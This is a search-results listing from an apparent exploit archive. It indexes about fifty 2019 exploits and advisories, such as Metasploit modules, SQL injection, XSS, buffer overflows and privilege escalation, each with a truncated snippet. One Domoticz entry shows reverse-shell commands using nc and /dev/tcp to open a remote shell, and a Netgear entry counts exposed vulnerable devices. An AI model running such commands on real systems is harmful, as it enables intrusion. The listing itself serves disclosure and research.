47904 matches found
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone to remote code execution due to...
iOS 12.1.3 - 'cfprefsd' Memory Corruption
// c 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes // Intended only for educational and defensive purposes only. // Use at your own risk. include import include include include include include define AGENT 1 define FILLDICTCOUNT 0x600 define FILLCOUNT 0x1000 define FREECOU...
NSClient++ 0.5.2.35 - Privilege Escalation
Exploit Author: bzyo Twitter: @bzyo Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation Date: 05-05-19 Vulnerable Software: NSClient++ 0.5.2.35 Vendor Homepage: http://nsclient.org/ Version: 0.5.2.35 Software Link: http://nsclient.org/download/ Tested on: Windows 10 x64 Details: When...
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection
Sql Injection on microASP Portal+ CMS + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: [email protected] + Tested on: Windows 7 and Gnu/Linux + Dork: inurl:"/pagina.phtml?explodetree" // use your...
Microsoft Windows PowerShell ISE - Remote Code Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt + ISR: ApparitionSec + Zero Day Initiative Program Vendor www.microsoft.com Product Windows PowerShell ISE The...
Blue Angel Software Suite - Command Execution
Exploit Title: Blue Angel Software Suite - Authenticated Command Execution Google Dork: N/A Date: 02/05/2019 Exploit Author: Paolo Serracino Vendor Homepage: http://www.5vtechnologies.com Software Link: N/A Version: All Tested on: Embedded Linux OS CVE : N/A Description: Blue Angel Software Suite...
SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service
Vendor: Solarwinds Site Vendor: https://www.dameware.com/ Product: Dameware Mini Remote Control Version: 10.0 x64 Platform: Windows Tested on: Windows 7 SP1 x64 Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. The buffer size passed in on the machine name...
Instagram Auto Follow - Authentication Bypass
Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass Date: 2019-05-01 Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?srank=4 Tested on: Linux https://eowynlab.cf/autobot-follow/index.php username:...
Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection
Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Date: 05/01/2019 Exploit Author: Jacob Baines Tested on: Crestron AM-100 1.6.0.2 CVE : CVE-2019-3929 PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k Advisory:...
WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution
Title: RCE in Social Warfare Plugin Wordpress =3D3.5.2 Date: March, 2019 Researcher: Luka Sikic Exploit Author: hash3liZer Download Link: https://wordpress.org/plugins/social-warfare/ Reference:...
Zotonic < 0.47.0 mod_admin - Cross-Site Scripting
Exploit Title: Zotonic prompt‘XSS’ Affected source code file zotonicmodadmin: - zotonicmodadminidentity\priv\templates\adminsortheader.tpl - zotonicmodadminidentity\priv\templates\adminusers.tpl References http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel0.47.0.html...
Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ruby On Rails DoubleTap Development Mode secretkeybase Vulnerability', 'Description' = %q This module exploits a vulnerability in Ruby on Rails. ...
CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting
Exploit Title: CentOS Web Panel - Domain Field Add DNS Zone Cross-Site Scripting Vulnerability Google Dork: N/A Date: 22 - April - 2019 Exploit Author: DKM Vendor Homepage: http://centos-webpanel.com Software Link: http://centos-webpanel.com Version: v0.9.8.793 Free, v0.9.8.753 Pro and 0.9.8.807...
HumHub 1.3.12 - Cross-Site Scripting
Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php Vulnerable File :...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability whi...
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
/bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a denial of service reboot, as demonstrated by JSON misparsing ...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 27, 2019 Vendor Homepage: http://www.ari-soft.com Software Link :...
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
/bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices. https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices. A...
Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Pimcore Unserialize RCE", 'Description' = %q This module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An...
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery
Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery All Actions/Methods Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.ht...
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
!/usr/bin/python Exploit Title: Oracle Weblogic Exploit CVE-2019-2725 Date: 30/04/2019 Exploit Author: Avinash Kumar Thapa Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html Version: Oracl...
AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AIS logistics ESEL-Server Unauth SQL Injection RCE', 'Description' = %q This module will execute an arbitrary payload on an "ESEL" server used by...
Joomla! Component JiFile 2.3.1 - Arbitrary File Download
Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 28, 2019 Vendor Homepage: http://www.isapp.it Software Link :...
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...
DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Discovery Date: 25/04/2019 Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP Pro x64, Windows 7 32bit CVE :...
Agent Tesla Botnet - Information Disclosure
Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10, debian 7 CVE : n/a Greetz: Shell.root,...
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-27 Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows Windows 10 Single...
Hyvikk Fleet Manager - Shell Upload
======================================================================================== | Fleet Manager hyvikk Shell Upload Date: 29-04-2019 Title : Fleet Manager by hyvikk All versions | Author : saxgy1331 - Kaieteur-Falls-1331 | Vendor Homepage: https://codecanyon.net/item/fleet-manager/200518...
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification
elfcoredump has a comment back from something like 2.5.43-C3 that says: / We no longer stop all VM operations. This is because those proceses that could possibly change mapcount or the mmap / vma pages are now blocked in doexit on current finishing this core dump. Only ptrace can touch these memo...
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery
IWR 3000N - CSRF on authenticated administrator Exploit! Click the button to get the login and password. function exploit $.get "http://localhost:80/v1/system/user" .done data = alert data ; .failfunction err, status alert status ; ;...
NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)
Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1 Steps t...
Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting
Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE: CVE-2019-0186 References:...
systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process
This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the service. This bug probably has relatively low severity, given that there aren't...
NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)
Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1...
RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework TODO: add other non-payload files class MetasploitModule 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', 'Description' = %q In WinRAR versions prior t...
osTicket 1.11 - Cross-Site Scripting / Local File Inclusion
Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link: https://github.com/osTicket/osTicket References:...
JioFi 4G M2S 1.0.2 - Denial of Service
Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)
Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Tested on: Windows XP SP3 EN Windows 7 Sp1 x64 1.- Run python code :...
JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting
Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...
Backup Key Recovery 2.2.4 - Denial of Service (PoC)
Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested Version: 2.2.4 Tested on: Windows 7 x64 Service Pac...
HeidiSQL 10.1.0.5464 - Denial of Service (PoC)
Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL10.164Portable.zip Tested Version: 10.1.0.5464 Tested on:...
AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)
Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anmingsetup.zip?token=1556228877063f2dc0aed064ee5d13374d8509661c&fileName=anmingsetup.zip Exploit Author: Achilles...
Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow
VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle Factory::NewFixedDoubleArrayint length, PretenureFlag pretenure DCHECKLE0, length; if length == 0 return emptyfixedarray; if length...
VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation
VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t secure its COM interface leading to arbitrary code injection and EoP. Description: This...
systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit
As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on a local console - or neither This is expressed in the policy using the elements "allowany",...